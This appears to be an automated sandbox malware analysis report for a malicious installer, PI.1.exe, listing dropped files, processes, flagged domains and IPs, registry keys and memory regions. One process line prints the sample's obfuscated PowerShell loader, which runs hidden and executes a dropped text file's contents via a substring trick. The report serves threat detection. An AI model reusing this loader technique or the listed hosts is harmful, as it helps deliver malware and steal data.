IOC Report
PI.1.exe

loading gif

Files

File Path
Type
Category
Malicious
PI.1.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Celebrates\Natkjole\Capron\Hovedperson16.Red
ASCII text, with very long lines (60671), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Kisang\PI.1.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3xdlnc2t.ync.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_42hjicmt.id1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Kisang\PI.1.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Kisang\topchefs.fla
data
dropped
C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Microhymenopteron\Unensured\retardment.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Microhymenopteron\Unensured\siegeable.dog
data
dropped
C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Microhymenopteron\Unensured\slobberchops.fro
data
dropped
C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Paracelsist.man
data
dropped
C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Rousement252.out
data
dropped
C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Vavs.Rid
data
dropped
C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\lgprdikantens.per
data
dropped
C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\mult.tre
data
dropped
C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\passewa.ami
data
dropped
C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\quango.pro
data
dropped
There are 8 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\PI.1.exe
C:\Users\user\Desktop\PI.1.exe
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell" -windowstyle hidden "$Credibilities=Get-Content 'C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Celebrates\Natkjole\Capron\Hovedperson16.Red';$Skrupkedet=$Credibilities.SubString(60665,3);.$Skrupkedet($Credibilities)
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe" /c "set /A 1^^0
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
C:\Program Files (x86)\windows mail\wab.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://api.ipify.org/
104.26.13.205
http://nuget.org/NuGet.exe
unknown
https://api.ipify.org
unknown
https://aka.ms/pscore6lB_q
unknown
http://crl.microsoft
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://scootero.cl
unknown
https://apwisulsel.sa.com/cM
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://api.ipify.org/t
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://mail.scootero.cl
unknown
https://apwisulsel.sa.com/
unknown
https://github.com/Pester/Pester
unknown
There are 9 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
scootero.cl
177.221.140.242
malicious
mail.scootero.cl
unknown
malicious
api.ipify.org
104.26.13.205
apwisulsel.sa.com
104.128.228.214

IPs

IP
Domain
Country
Malicious
177.221.140.242
scootero.cl
unknown
malicious
104.128.228.214
apwisulsel.sa.com
United States
104.26.13.205
api.ipify.org
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\faksimileringer\lyslederkabler
sofabordenes
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileDirectory
There are 6 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
20711000
trusted library allocation
page read and write
malicious
20737000
trusted library allocation
page read and write
malicious
2074C000
trusted library allocation
page read and write
malicious
9690000
direct allocation
page execute and read and write
malicious
34CE000
stack
page read and write
4E80000
direct allocation
page read and write
22E40000
trusted library allocation
page read and write
207DD000
trusted library allocation
page read and write
770B000
stack
page read and write
87F000
unkown
page read and write
4AD0000
heap
page read and write
22D9F000
stack
page read and write
23540000
trusted library allocation
page read and write
229CB000
heap
page read and write
8D00000
trusted library allocation
page read and write
22E60000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
5128000
trusted library allocation
page read and write
4D40000
trusted library section
page read and write
754000
heap
page read and write
519E000
stack
page read and write
22E60000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
22A61000
heap
page read and write
22E50000
trusted library allocation
page read and write
8CFF000
stack
page read and write
72D0000
heap
page execute and read and write
7490000
direct allocation
page read and write
6A0000
heap
page read and write
8E30000
trusted library allocation
page execute and read and write
22E50000
trusted library allocation
page read and write
7510000
direct allocation
page read and write
22DDE000
stack
page read and write
22E40000
trusted library allocation
page read and write
20590000
trusted library allocation
page read and write
75C000
heap
page read and write
22E50000
trusted library allocation
page read and write
33BD000
heap
page read and write
64E000
unkown
page read and write
206C1000
trusted library allocation
page read and write
51C9000
heap
page read and write
2790000
heap
page read and write
758000
heap
page read and write
23550000
trusted library allocation
page execute and read and write
22E50000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
75C000
heap
page read and write
22A4D000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
8B6F000
heap
page read and write
22E50000
trusted library allocation
page read and write
75EA000
stack
page read and write
3250000
heap
page read and write
22E50000
trusted library allocation
page read and write
236FE000
stack
page read and write
4DC0000
heap
page readonly
33C9000
heap
page read and write
227B2000
trusted library allocation
page read and write
8AB4000
heap
page read and write
23740000
trusted library allocation
page read and write
206A0000
trusted library allocation
page read and write
771000
heap
page read and write
22A40000
trusted library allocation
page read and write
23740000
trusted library allocation
page read and write
4D6D000
trusted library allocation
page execute and read and write
4DE0000
direct allocation
page read and write
758000
heap
page read and write
8A80000
heap
page read and write
75C000
heap
page read and write
2354E000
trusted library allocation
page read and write
4BD0000
heap
page read and write
2057D000
trusted library allocation
page execute and read and write
771000
heap
page read and write
748000
heap
page read and write
20690000
trusted library allocation
page read and write
5A72000
trusted library allocation
page read and write
8930000
trusted library allocation
page execute and read and write
7BF7000
trusted library allocation
page read and write
4D63000
trusted library allocation
page execute and read and write
22A40000
trusted library allocation
page read and write
758000
heap
page read and write
207E2000
trusted library allocation
page read and write
22E90000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
309F000
stack
page read and write
7B14000
heap
page read and write
7C20000
trusted library allocation
page read and write
22E90000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
69E000
stack
page read and write
202AE000
stack
page read and write
7C40000
trusted library allocation
page read and write
74A0000
direct allocation
page read and write
7DE0000
trusted library allocation
page read and write
3CE0000
remote allocation
page execute and read and write
7E10000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
227C6000
trusted library allocation
page read and write
421000
unkown
page read and write
4D80000
trusted library allocation
page read and write
22EA0000
trusted library allocation
page execute and read and write
22E40000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
7B6F000
heap
page read and write
8B31000
heap
page read and write
88D0000
heap
page read and write
731F000
stack
page read and write
22E60000
trusted library allocation
page read and write
44B000
unkown
page readonly
206FF000
trusted library allocation
page read and write
22E90000
trusted library allocation
page read and write
205C0000
heap
page read and write
8E70000
trusted library allocation
page read and write
8D4C000
stack
page read and write
20568000
stack
page read and write
20F5000
heap
page read and write
2021D000
stack
page read and write
22E50000
trusted library allocation
page read and write
73DE000
stack
page read and write
23740000
trusted library allocation
page read and write
8EA0000
direct allocation
page read and write
22E50000
trusted library allocation
page read and write
3560000
trusted library section
page read and write
206B0000
heap
page execute and read and write
2039F000
stack
page read and write
756000
heap
page read and write
76CE000
stack
page read and write
22E90000
trusted library allocation
page read and write
7E50000
trusted library allocation
page read and write
7710000
heap
page read and write
4D92000
trusted library allocation
page read and write
7D90000
trusted library allocation
page read and write
22E90000
trusted library allocation
page read and write
4B8D000
heap
page read and write
2172A000
trusted library allocation
page read and write
22E90000
trusted library allocation
page read and write
4E00000
direct allocation
page read and write
23549000
trusted library allocation
page read and write
2794000
heap
page read and write
735E000
stack
page read and write
520F000
stack
page read and write
22E90000
trusted library allocation
page read and write
758000
heap
page read and write
22E50000
trusted library allocation
page read and write
790E000
stack
page read and write
450000
heap
page read and write
743000
heap
page read and write
23760000
trusted library allocation
page read and write
771000
heap
page read and write
22E90000
trusted library allocation
page read and write
2279E000
stack
page read and write
44B000
unkown
page readonly
229B7000
heap
page read and write
20570000
trusted library allocation
page read and write
4D8A000
trusted library allocation
page execute and read and write
23780000
trusted library allocation
page execute and read and write
8E20000
trusted library allocation
page read and write
22E90000
trusted library allocation
page read and write
892F000
stack
page read and write
20400000
remote allocation
page read and write
22E51000
trusted library allocation
page read and write
7C80000
trusted library allocation
page read and write
22A40000
trusted library allocation
page read and write
754000
heap
page read and write
22E50000
trusted library allocation
page read and write
3414000
heap
page read and write
205AB000
trusted library allocation
page execute and read and write
3D90000
remote allocation
page execute and read and write
22E50000
trusted library allocation
page read and write
4B3B000
heap
page read and write
22E40000
trusted library allocation
page read and write
19A000
stack
page read and write
3411000
heap
page read and write
354F000
stack
page read and write
23760000
trusted library allocation
page read and write
228E8000
trusted library allocation
page read and write
350E000
stack
page read and write
4D20000
heap
page read and write
78CE000
stack
page read and write
22E50000
trusted library allocation
page read and write
20510000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
537F000
heap
page read and write
8E1C000
stack
page read and write
22E40000
trusted library allocation
page read and write
4C00000
heap
page read and write
4EEE000
stack
page read and write
207CD000
trusted library allocation
page read and write
227F0000
trusted library allocation
page read and write
3216000
heap
page read and write
74E0000
direct allocation
page read and write
771000
heap
page read and write
205A7000
trusted library allocation
page execute and read and write
22E90000
trusted library allocation
page read and write
7E20000
trusted library allocation
page read and write
748000
heap
page read and write
227AE000
trusted library allocation
page read and write
2330000
heap
page read and write
227A6000
trusted library allocation
page read and write
228E0000
trusted library allocation
page read and write
23790000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
22A60000
heap
page read and write
22E50000
trusted library allocation
page read and write
5A78000
trusted library allocation
page read and write
762E000
stack
page read and write
748000
heap
page read and write
627E000
trusted library allocation
page read and write
794E000
stack
page read and write
22E40000
trusted library allocation
page read and write
77A000
heap
page read and write
77A000
heap
page read and write
22E60000
trusted library allocation
page read and write
22E90000
trusted library allocation
page read and write
22E70000
trusted library allocation
page read and write
4D90000
trusted library allocation
page read and write
22E60000
trusted library allocation
page read and write
22E90000
trusted library allocation
page read and write
23546000
trusted library allocation
page read and write
228E0000
trusted library allocation
page read and write
2035E000
stack
page read and write
22E40000
trusted library allocation
page read and write
771000
heap
page read and write
22A43000
trusted library allocation
page read and write
75C000
heap
page read and write
22E40000
trusted library allocation
page read and write
205B0000
trusted library allocation
page execute and read and write
4790000
remote allocation
page execute and read and write
228F0000
heap
page read and write
3578000
heap
page read and write
433000
unkown
page read and write
9E0000
heap
page read and write
3720000
trusted library allocation
page read and write
22E60000
trusted library allocation
page read and write
75C000
heap
page read and write
3570000
heap
page read and write
2798000
heap
page read and write
22E47000
trusted library allocation
page read and write
7E40000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
8B0B000
heap
page read and write
20490000
direct allocation
page read and write
22E40000
trusted library allocation
page read and write
229CE000
heap
page read and write
2025C000
stack
page read and write
766B000
stack
page read and write
22E40000
trusted library allocation
page read and write
229BC000
heap
page read and write
22E50000
trusted library allocation
page read and write
22E43000
trusted library allocation
page read and write
22E90000
trusted library allocation
page read and write
74C0000
direct allocation
page read and write
22E50000
trusted library allocation
page read and write
89B000
heap
page read and write
4B2F000
heap
page read and write
23760000
trusted library allocation
page read and write
748000
heap
page read and write
4B41000
heap
page read and write
2353E000
stack
page read and write
600000
heap
page read and write
748000
heap
page read and write
748000
heap
page read and write
754000
heap
page read and write
227BE000
trusted library allocation
page read and write
2795000
heap
page read and write
20F9000
heap
page read and write
22A50000
heap
page execute and read and write
7BF0000
trusted library allocation
page read and write
63A9000
trusted library allocation
page read and write
8DDE000
stack
page read and write
7B8B000
heap
page read and write
2047F000
stack
page read and write
8975000
trusted library allocation
page read and write
771000
heap
page read and write
4BF0000
heap
page readonly
216C1000
trusted library allocation
page read and write
7E00000
trusted library allocation
page read and write
407000
unkown
page readonly
23740000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
7B57000
heap
page read and write
228E0000
trusted library allocation
page read and write
2A3E000
stack
page read and write
22E50000
trusted library allocation
page read and write
4D50000
trusted library allocation
page read and write
754000
heap
page read and write
42B000
unkown
page read and write
754000
heap
page read and write
8840000
trusted library allocation
page execute and read and write
22A40000
trusted library allocation
page read and write
22D5D000
stack
page read and write
8CBE000
stack
page read and write
2287C000
stack
page read and write
8B15000
heap
page read and write
42D000
unkown
page read and write
51A0000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
237B0000
trusted library allocation
page read and write
754000
heap
page read and write
AF0000
heap
page read and write
22A4D000
trusted library allocation
page read and write
207BD000
trusted library allocation
page read and write
7D4E000
stack
page read and write
7DF0000
trusted library allocation
page read and write
A090000
direct allocation
page execute and read and write
741F000
stack
page read and write
88CD000
stack
page read and write
207CB000
trusted library allocation
page read and write
89A0000
trusted library allocation
page read and write
754000
heap
page read and write
7AD0000
trusted library allocation
page read and write
758000
heap
page read and write
4B47000
heap
page read and write
2283C000
stack
page read and write
2043E000
stack
page read and write
400000
unkown
page readonly
7500000
direct allocation
page read and write
724C000
stack
page read and write
754000
heap
page read and write
4AEB000
heap
page read and write
401000
unkown
page execute read
228C0000
trusted library allocation
page read and write
2296D000
heap
page read and write
22E90000
trusted library allocation
page read and write
202EF000
stack
page read and write
771000
heap
page read and write
2059A000
trusted library allocation
page execute and read and write
63C2000
trusted library allocation
page read and write
2A7F000
stack
page read and write
23750000
trusted library allocation
page read and write
20596000
trusted library allocation
page execute and read and write
22E40000
trusted library allocation
page read and write
22A40000
trusted library allocation
page read and write
22E80000
trusted library allocation
page read and write
75C000
heap
page read and write
22E50000
trusted library allocation
page read and write
8B23000
heap
page read and write
227D2000
trusted library allocation
page read and write
77A000
heap
page read and write
2F9C000
stack
page read and write
22E90000
trusted library allocation
page read and write
75C000
heap
page read and write
22E90000
trusted library allocation
page read and write
72D5000
heap
page execute and read and write
7BDC000
heap
page read and write
77A000
heap
page read and write
74F0000
direct allocation
page read and write
22E90000
trusted library allocation
page read and write
4E60000
direct allocation
page read and write
22E40000
trusted library allocation
page read and write
754000
heap
page read and write
23760000
trusted library allocation
page read and write
400000
unkown
page readonly
7CCE000
stack
page read and write
22A40000
trusted library allocation
page read and write
23460000
trusted library allocation
page read and write
5211000
trusted library allocation
page read and write
23770000
trusted library allocation
page read and write
4E70000
direct allocation
page read and write
7520000
direct allocation
page read and write
6DE000
stack
page read and write
22E50000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
8A94000
heap
page read and write
22E50000
trusted library allocation
page read and write
8A88000
heap
page read and write
7F510000
trusted library allocation
page execute and read and write
22A40000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
748000
heap
page read and write
758000
heap
page read and write
22E40000
trusted library allocation
page read and write
20F0000
heap
page read and write
2792000
heap
page read and write
23480000
trusted library allocation
page read and write
2190000
heap
page read and write
279B000
heap
page read and write
409000
unkown
page write copy
73D000
heap
page read and write
22E40000
trusted library allocation
page read and write
2799000
heap
page read and write
22E60000
trusted library allocation
page read and write
51C0000
heap
page read and write
226C8000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
227E0000
trusted library allocation
page read and write
22E60000
trusted library allocation
page read and write
336E000
stack
page read and write
22A40000
trusted library allocation
page read and write
89D0000
trusted library allocation
page read and write
2075A000
trusted library allocation
page read and write
7D8D000
stack
page read and write
650000
heap
page read and write
279D000
heap
page read and write
22E40000
trusted library allocation
page read and write
227C1000
trusted library allocation
page read and write
754000
heap
page read and write
74B0000
direct allocation
page read and write
23760000
trusted library allocation
page read and write
7C10000
trusted library allocation
page read and write
7E9B000
stack
page read and write
4D60000
trusted library allocation
page read and write
4D70000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
23540000
trusted library allocation
page read and write
89C0000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
595000
heap
page read and write
3690000
heap
page read and write
22E40000
trusted library allocation
page read and write
227AB000
trusted library allocation
page read and write
5A70000
trusted library allocation
page read and write
758000
heap
page read and write
23760000
trusted library allocation
page read and write
798E000
stack
page read and write
22E40000
trusted library allocation
page read and write
7C30000
trusted library allocation
page read and write
22E60000
trusted library allocation
page read and write
279C000
heap
page read and write
2340000
heap
page read and write
205A5000
trusted library allocation
page execute and read and write
22E50000
trusted library allocation
page read and write
7B29000
heap
page read and write
77A000
heap
page read and write
5150000
heap
page execute and read and write
23760000
trusted library allocation
page read and write
4E90000
direct allocation
page read and write
22A40000
trusted library allocation
page read and write
228C0000
trusted library allocation
page read and write
20574000
trusted library allocation
page read and write
56E000
stack
page read and write
229AB000
heap
page read and write
739E000
stack
page read and write
23740000
trusted library allocation
page read and write
234FE000
stack
page read and write
7480000
direct allocation
page read and write
758000
heap
page read and write
426000
unkown
page read and write
771000
heap
page read and write
2344000
heap
page read and write
227A0000
trusted library allocation
page read and write
75C000
heap
page read and write
710000
heap
page read and write
217E000
stack
page read and write
229F000
stack
page read and write
75AE000
stack
page read and write
407000
unkown
page readonly
22E50000
trusted library allocation
page read and write
4D64000
trusted library allocation
page read and write
4E50000
direct allocation
page read and write
5273000
trusted library allocation
page read and write
2795000
heap
page read and write
22E60000
trusted library allocation
page read and write
20751000
trusted library allocation
page read and write
748000
heap
page read and write
3370000
heap
page read and write
4E40000
direct allocation
page read and write
8B41000
heap
page read and write
207D8000
trusted library allocation
page read and write
3210000
heap
page read and write
22E50000
trusted library allocation
page read and write
8D8C000
stack
page read and write
77A000
heap
page read and write
22E40000
trusted library allocation
page read and write
8827000
stack
page read and write
79D2000
heap
page read and write
23750000
trusted library allocation
page read and write
75C000
heap
page read and write
4C05000
heap
page read and write
22E80000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
771000
heap
page read and write
7AF0000
heap
page read and write
213E000
stack
page read and write
23760000
trusted library allocation
page read and write
2296D000
heap
page read and write
22900000
heap
page read and write
22E40000
trusted library allocation
page read and write
22A40000
trusted library allocation
page read and write
2058D000
trusted library allocation
page execute and read and write
2079C000
trusted library allocation
page read and write
90F000
stack
page read and write
20400000
remote allocation
page read and write
7AC0000
heap
page execute and read and write
22E50000
trusted library allocation
page read and write
22E76000
trusted library allocation
page read and write
2070D000
trusted library allocation
page read and write
22E70000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
23740000
trusted library allocation
page read and write
7470000
direct allocation
page read and write
2291D000
heap
page read and write
237A0000
trusted library allocation
page read and write
23460000
trusted library allocation
page execute and read and write
207E7000
trusted library allocation
page read and write
22A40000
trusted library allocation
page read and write
22E70000
trusted library allocation
page read and write
2799000
heap
page read and write
777000
heap
page read and write
88E0000
heap
page read and write
2294C000
heap
page read and write
771000
heap
page read and write
22E50000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
69E000
stack
page read and write
4D79000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
8E50000
trusted library allocation
page execute and read and write
20260000
trusted library allocation
page read and write
237A0000
trusted library allocation
page read and write
23770000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
20300000
heap
page read and write
22800000
trusted library allocation
page read and write
22E90000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
29D000
stack
page read and write
2060E000
stack
page read and write
72CE000
stack
page read and write
20400000
remote allocation
page read and write
39D000
stack
page read and write
4E30000
direct allocation
page read and write
22E90000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
20573000
trusted library allocation
page execute and read and write
6211000
trusted library allocation
page read and write
22E52000
trusted library allocation
page read and write
22E70000
trusted library allocation
page read and write
7FCE0000
trusted library allocation
page execute and read and write
2068C000
stack
page read and write
22E40000
trusted library allocation
page read and write
89B0000
trusted library allocation
page read and write
590000
heap
page read and write
8B2D000
heap
page read and write
4B44000
heap
page read and write
22E40000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
77A000
heap
page read and write
22E40000
trusted library allocation
page read and write
754000
heap
page read and write
748000
heap
page read and write
8E40000
trusted library allocation
page read and write
22EA0000
trusted library allocation
page read and write
205A2000
trusted library allocation
page read and write
7D0E000
stack
page read and write
7DA0000
trusted library allocation
page read and write
227CD000
trusted library allocation
page read and write
21753000
trusted library allocation
page read and write
22E60000
trusted library allocation
page read and write
63BD000
trusted library allocation
page read and write
22E90000
trusted library allocation
page read and write
20580000
trusted library allocation
page read and write
728E000
stack
page read and write
409000
unkown
page read and write
206F6000
trusted library allocation
page read and write
2373F000
stack
page read and write
718000
heap
page read and write
22E90000
trusted library allocation
page read and write
4BBC000
heap
page read and write
7DB0000
trusted library allocation
page read and write
4DB0000
trusted library allocation
page read and write
401000
unkown
page execute read
22E60000
trusted library allocation
page read and write
8830000
heap
page read and write
4AD8000
heap
page read and write
4F20000
heap
page read and write
279C000
heap
page read and write
22E41000
trusted library allocation
page read and write
22E8D000
stack
page read and write
205A0000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
7B0B000
heap
page read and write
2015E000
stack
page read and write
771000
heap
page read and write
98000
stack
page read and write
758000
heap
page read and write
23750000
trusted library allocation
page read and write
74D0000
direct allocation
page read and write
2078F000
trusted library allocation
page read and write
4E20000
direct allocation
page read and write
75C000
heap
page read and write
8B3D000
heap
page read and write
7BCF000
heap
page read and write
20592000
trusted library allocation
page read and write
20520000
heap
page read and write
3390000
heap
page read and write
8850000
trusted library allocation
page read and write
AEF000
stack
page read and write
8E60000
heap
page read and write
22E40000
trusted library allocation
page read and write
201DE000
stack
page read and write
4B12000
heap
page read and write
22E70000
trusted library allocation
page read and write
77A000
heap
page read and write
22E50000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
748000
heap
page read and write
2FD8000
stack
page read and write
758000
heap
page read and write
5140000
trusted library allocation
page execute and read and write
228C0000
trusted library allocation
page read and write
448000
unkown
page read and write
4E10000
direct allocation
page read and write
22E40000
trusted library allocation
page read and write
4DD7000
heap
page read and write
95E0000
direct allocation
page execute and read and write
22E40000
trusted library allocation
page read and write
890000
heap
page read and write
340F000
heap
page read and write
4C07000
heap
page read and write
22E90000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
216E9000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
4B3D000
heap
page read and write
4F27000
heap
page read and write
7E30000
trusted library allocation
page read and write
2019D000
stack
page read and write
6239000
trusted library allocation
page read and write
228C0000
heap
page read and write
230E000
stack
page read and write
2363E000
stack
page read and write
22E40000
trusted library allocation
page read and write
8E90000
direct allocation
page read and write
22E80000
trusted library allocation
page read and write
204EA000
stack
page read and write
22E40000
trusted library allocation
page read and write
4DF0000
direct allocation
page read and write
22A40000
trusted library allocation
page read and write
4B47000
heap
page read and write
77A000
heap
page read and write
22EA0000
trusted library allocation
page read and write
570000
heap
page read and write
204A0000
direct allocation
page read and write
22E50000
trusted library allocation
page read and write
22E1E000
stack
page read and write
22E60000
trusted library allocation
page read and write
7B39000
heap
page read and write
758000
heap
page read and write
5366000
trusted library allocation
page read and write
22E80000
trusted library allocation
page read and write
8A9A000
heap
page read and write
344D000
heap
page read and write
22E40000
trusted library allocation
page read and write
278F000
stack
page read and write
227A4000
trusted library allocation
page read and write
22E40000
trusted library allocation
page read and write
75C000
heap
page read and write
22E40000
trusted library allocation
page read and write
7AE0000
trusted library allocation
page execute and read and write
2064E000
stack
page read and write
22E40000
trusted library allocation
page read and write
20B0000
heap
page read and write
22E50000
trusted library allocation
page read and write
22E50000
trusted library allocation
page read and write
3398000
heap
page read and write
4DD0000
heap
page read and write
7DC0000
trusted library allocation
page read and write
7B4A000
heap
page read and write
8E80000
direct allocation
page execute and read and write
77A000
heap
page read and write
4D95000
trusted library allocation
page execute and read and write
23540000
trusted library allocation
page read and write
23770000
trusted library allocation
page read and write
4AC0000
heap
page read and write
23750000
trusted library allocation
page read and write
There are 664 hidden memdumps, click here to show them.